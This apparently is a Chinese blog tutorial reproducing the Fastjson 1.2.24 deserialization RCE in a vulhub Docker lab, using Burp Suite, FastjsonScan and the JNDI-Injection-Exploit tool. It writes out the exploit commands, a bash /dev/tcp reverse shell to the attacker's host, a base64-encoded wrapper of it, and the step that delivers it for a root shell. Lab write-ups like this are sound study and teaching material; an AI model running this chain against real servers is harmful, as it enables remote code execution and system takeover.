fastjson漏洞复现

EMT009232023-09-11 19:10

文章目录

启动环境

到vulhub目录下

复制代码 
cd vulhub/fastjson/1.2.24-rce

安装环境并启动:

复制代码 
sudo docker-compose up -d && sudo docker-compose up -d

启动成功,如图:

查看端口发现是8090,打开bp内置浏览器,输入10.9.75.45:8090打开环境:

漏洞复现

FastJson 是Alibab的一款开源Json 解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE 漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞。

关于FasiJson 1.2.24 反序列化漏洞,简单来说,就是FastJson 通过parsebiect/parse 将传入的字符由反广列化为Java 对象时由于没有进行合理检查而导致的。

打开环境后用bp抓包,Ctrl+r发送到repeater模块,右键改为post方法,将content-type字段改为application/json,然后添加一个json格式的数据并提交:

复制代码 
{"name":"EMT","age":24}

上传成功:

这个过程中:json-> object -> json,进行了序列化和反序列化

下载bp插件

到网站Releases · Maskhe/FastjsonScan (github.com),复制FastjsonScan.jar包的地址:

在kali中到下面目录:

复制代码 
cd tools/burpsuite/extensions

新建一个目录:

复制代码 
mkdir Fastjosnscan

到新建的目录下,输入命令拉取FastjsonScan.jar包:

复制代码 
proxychains wget https://github.com/Maskhe/FastjsonScan/releases/download/1.0/FastjsonScan.jar

在bp中选择extensions,点击add,添加插件:

安装插件已完成:

漏洞扫描

来到repeater模块,将数据包发送到FastjsonScan:

发送后等待扫描结束后发现漏洞,得到漏洞利用的poc:

poc中有rmi,它相当于Java的http协议,通过它可以远程执行引用一个外部类。

dnslog测试是否向外请求资源

生成一个URL:

用lbap测试是否有URL跳转:

测试成功。有URL跳转,向外部请求资源:

用工具构造rmi服务器

复制代码 
cd tools

新建一个文件夹JNDI-Injection-Exploit,进入该目录,输入命令下载工具:

复制代码 
sudo wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

下载完成后在该目录下执行命令:

复制代码 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/EMT" -A "10.9.75.45"

成功构建出服务器,显示出URL:

用生成的URL到数据包中提交,如果成功就可以在容器的tmp目录下创建一个EMT文件,点击send后报错,返回号500:

用命令查看容器ID:

复制代码 
sudo docker ps -a

如图:

登录容器:

复制代码 
sudo docker exec -it 26ad /bin/bash

如图,登录成功:

查看tmp目录下的文件,写入文件成功:

反弹shell

用上面的漏洞可以写一个反弹shell命令来获取对方的shell:

反弹shell命令,端口设为1234:

复制代码 
bash -i >& /dev/tcp/10.9.75.45/1234 0>&1

进行base64编码:

复制代码 
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ==

将base64编码组成下面命令

复制代码 
bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}

同上,用工具构造一个可以发送的url:

复制代码 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "10.9.75.45"

如图,构造成功:

监听1234端口:

复制一条URL到数据包中点击发送:

反弹shell成功,获取到root权限:

相关推荐
一路随云000008 分钟前
基于Unity YooAsset自动化资源管理框架,附源代码
运维·自动化
数数科技的数据干货1 小时前
从爆款到厂牌:解读游戏工业化的业务持续增长道路
运维·数据库·人工智能
网安小白的进阶之路2 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-6
网络·安全·web安全
蚁巡信息巡查系统2 小时前
自媒体内容安全审核指引怎么写,有哪些内容?
安全·信息可视化·媒体·内容运营
执念WRD4 小时前
熊海CMS v1.0代码审计实战
android·nginx·安全·web安全·网络安全·系统安全
深耕AI5 小时前
【完整教程】宝塔面板FTP配置与FileZilla连接服务器
运维·服务器
无聊的小坏坏6 小时前
从单 Reactor 线程池到 OneThreadOneLoop:高性能网络模型的演进
服务器·网络·一个线程一个事件循环
AI智域边界 - Alvin Cho7 小时前
Bloomberg、LSEG 与 MCP 缺口:为什么尚未发布完整的 MCP 服务器,以及多智能体系统如何解決这问题
运维·服务器
_OP_CHEN8 小时前
Linux网络编程:(七)Vim 编辑器完全指南:从入门到精通的全方位实战教程
linux·运维·服务器·编辑器·vim·linux生态·linux软件
Maple_land8 小时前
第1篇:Linux工具复盘上篇:yum与vim
linux·运维·服务器·c++·centos
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件06BongoCat - 跨平台键盘猫动画工具07Labelme从安装到标注:零基础完整指南08jdk21下载、安装(Windows、Linux、macOS)09刚刚!字节 Trae SOLO 正式发布,限时免费10全面评测 | Photoshop 2026 新特性深度解析与实测体验